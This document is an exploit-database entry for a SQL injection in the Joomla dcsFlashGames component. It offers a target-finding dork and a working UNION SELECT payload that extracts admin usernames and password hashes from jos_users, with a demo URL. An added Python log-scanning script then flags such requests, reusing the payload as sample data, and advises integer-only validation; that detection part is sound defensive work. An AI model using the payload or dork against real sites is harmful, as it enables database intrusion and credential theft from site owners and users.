Joomla Component dcsFlashGames (catid) SQL Vulnerability

2010-03-26T00:00:00
ID 1337DAY-ID-11454
Type zdt
Reporter kaMtiEz
Modified 2010-03-26T00:00:00

Description

Exploit for PHP platform in category web applications

========================================================
Joomla Component dcsFlashGames (catid) SQL Vulnerability
========================================================


[!]===========================================================================[!]
 
[~] Joomla Component dcsFlashGames SQL Vulnerability ( catid )
[~] Author  : kaMtiEz
[~] Homepage    : http://www.indonesiancoder.com
[~] Date    : 25 March, 2010
 
[!]===========================================================================[!]
 
[ Software Information ]
 
[+] Vendor : http://ekith.com/
[+] Description : http://ext.joom.ru/dcsflashgames.html
[+] Price : free
[+] Vulnerability : SQL
[+] Dork : inurl:"CIHUY" ;)
[+] Download : http://joomlacode.org/gf/project/sageth/frs/
[+] Version : 2.0RC1
 
[!]===========================================================================[!]
 
[ Vulnerable File ]
 
http://127.0.0.1/index.php?option=com_dcs_flashgames&Itemid=kaMtiEz&catid=[INDONESIANCODER]
 
[ XpL ]
 
666+union+all+select+1,2,user(),4,@@version,6,concat_ws(0x3a,username,password)+from+jos_users--
 
 
[ d3m0 ]
 
http://server/index.php?option=com_dcs_flashgames&Itemid=61&catid=51+union+all+select+1,2,user(),4,@@version,6,concat_ws(0x3a,username,password)+from+jos_users--
 
 
etc etc etc ;]
 
[!]===========================================================================[!]
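
Added example, not part of the original advisory: a check for the request pattern shown above in web server access logs. It flags requests to com_dcs_flashgames whose catid is not a plain integer; the combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Client address and request target from a combined-format access log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
COMPONENT = "com_dcs_flashgames"    # component named in the advisory
ASCII_INT = re.compile(r"[0-9]+")   # assumption: a category id is a plain integer

# Constructed sample log lines (documentation IP ranges). The second reuses the
# demo query string from the advisory, the third is a percent-encoded variant.
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Mar/2010:10:01:02 +0000] "GET /index.php?option='
    'com_dcs_flashgames&Itemid=61&catid=51 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [26/Mar/2010:10:01:05 +0000] "GET /index.php?option='
    'com_dcs_flashgames&Itemid=61&catid=51+union+all+select+1,2,user(),4,'
    '@@version,6,concat_ws(0x3a,username,password)+from+jos_users-- HTTP/1.1" 200 7300',
    '198.51.100.23 - - [26/Mar/2010:10:02:11 +0000] "GET /index.php?option='
    'com_dcs_flashgames&catid=51%20UNION%20SELECT%201 HTTP/1.1" 200 4100',
    '198.51.100.4 - - [26/Mar/2010:10:03:40 +0000] "GET /index.php?option='
    'com_content&catid=abc HTTP/1.1" 200 900',
]


def flag_catid(lines):
    """Return (client, decoded catid) for component requests with a non-integer catid."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if COMPONENT not in query.get("option", []):
            continue
        # parse_qs has already decoded '+' and %xx. Every catid occurrence is
        # checked, since a repeated parameter can hide a bad value behind a clean one.
        for value in query.get("catid", []):
            if not ASCII_INT.fullmatch(value):
                findings.append((client, value))
    return findings


if __name__ == "__main__":
    for client, value in flag_catid(SAMPLE_LOG):
        print(f"{client}\tcatid={value!r}")
```

The same integer-only rule, applied to catid before it reaches the query, is the server-side fix for this class of bug.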